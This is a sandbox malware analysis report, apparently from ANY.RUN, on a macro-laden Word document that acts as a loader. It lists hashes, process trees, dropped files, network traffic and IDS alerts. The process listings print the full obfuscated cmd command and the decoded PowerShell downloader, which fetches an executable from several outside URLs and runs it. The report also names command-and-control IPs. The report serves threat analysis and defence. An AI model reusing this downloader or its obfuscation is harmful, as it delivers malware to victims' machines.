analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7e8d76c01529141c3f4a02bc57b3f3e65608d765735372c2a9252c5238f53a91.doc

Full analysis: https://app.any.run/tasks/7b1c546a-b65a-41c4-9eab-ae5db0cc9dd6
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 22:52:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 20:15:00 2018, Last Saved Time/Date: Tue Dec 18 20:15:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0
MD5:

CCDEA96D5372D3FE3C5944C4EC64C8E2

SHA1:

2E9F229EBFE7A81ADEBF94B1C5CA6B3C8009C023

SHA256:

7E8D76C01529141C3F4A02BC57B3F3E65608D765735372C2A9252C5238F53A91

SSDEEP:

1536:bd81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadugQ8UUaovoU+a9:bd8GhDS0o9zTGOZD6EbzCdugQ8/o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2832)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2832)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2644)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2784)
    • Application was dropped or rewritten from another process

      • 678.exe (PID: 2256)
      • archivesymbol.exe (PID: 2524)
      • 678.exe (PID: 3052)
      • archivesymbol.exe (PID: 3072)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3220)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3220)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2644)
      • cmd.exe (PID: 1316)
    • Application launched itself

      • cmd.exe (PID: 2644)
      • archivesymbol.exe (PID: 2524)
    • Creates files in the user directory

      • powershell.exe (PID: 3220)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3220)
      • 678.exe (PID: 3052)
    • Starts itself from another location

      • 678.exe (PID: 3052)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3072)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2832)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2832)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 29
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 26
Words: 4
Pages: 1
ModifyDate: 2018:12:18 20:15:00
CreateDate: 2018:12:18 20:15:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
10
Malicious processes
4
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 678.exe no specs 678.exe archivesymbol.exe no specs archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2832"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7e8d76c01529141c3f4a02bc57b3f3e65608d765735372c2a9252c5238f53a91.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1316c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c %pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2644CmD /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | Cmd "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2684C:\Windows\system32\cmd.exe /S /D /c" ecHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2784Cmd C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3220powershell $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2256"C:\Users\admin\AppData\Local\Temp\678.exe" C:\Users\admin\AppData\Local\Temp\678.exepowershell.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Stoh Levadihote (non-ShiftLock) Keyboa
Exit code:
0
3052"C:\Users\admin\AppData\Local\Temp\678.exe"C:\Users\admin\AppData\Local\Temp\678.exe
678.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Stoh Levadihote (non-ShiftLock) Keyboa
Exit code:
0
2524"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe678.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Stoh Levadihote (non-ShiftLock) Keyboa
Exit code:
0
3072"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
Microsoft Corporat
Integrity Level:
MEDIUM
Description:
Stoh Levadihote (non-ShiftLock) Keyboa
Total events
1 784
Read events
1 303
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2832WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR94F3.tmp.cvr
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D4C8D2A2.wmf
MD5:
SHA256:
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45CEAB00.wmf
MD5:
SHA256:
3220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TC7RTD3W37RQ20W28BH3.temp
MD5:
SHA256:
3052678.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:CD5A9AA8B28BAE120213AED3AC409ED4
SHA256:7F8606EC3A585C87CC49AF394E82113EB136446CE0142E612997AE7C391F871B
3220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aadc.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3220powershell.exeC:\Users\admin\AppData\Local\Temp\678.exeexecutable
MD5:CD5A9AA8B28BAE120213AED3AC409ED4
SHA256:7F8606EC3A585C87CC49AF394E82113EB136446CE0142E612997AE7C391F871B
3220powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2832WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4D69D9BCBFC324E700A5A4D9E4D60348
SHA256:B0222DC047C29341F9E3DBAF99CE9E18787FBE50A3485DADF3E273D21B6B2E9C
2832WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1D16DE5.wmfwmf
MD5:EDB2F62BADC35E507F10B2FAEECC571F
SHA256:57A15807E410C55271B1738DE2312D61174E4126E049051484FB241B430DF3DD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3072
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
3220
powershell.exe
GET
301
158.69.193.16:80
http://kliksys.com/yuZ6yAFq
CA
html
236 b
malicious
3220
powershell.exe
GET
200
158.69.193.16:80
http://kliksys.com/yuZ6yAFq/
CA
executable
124 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3072
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
3072
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
3220
powershell.exe
158.69.193.16:80
kliksys.com
OVH SAS
CA
suspicious

DNS requests

Domain
IP
Reputation
kliksys.com
  • 158.69.193.16
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
3220
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3220
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3220
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3220
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3220
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info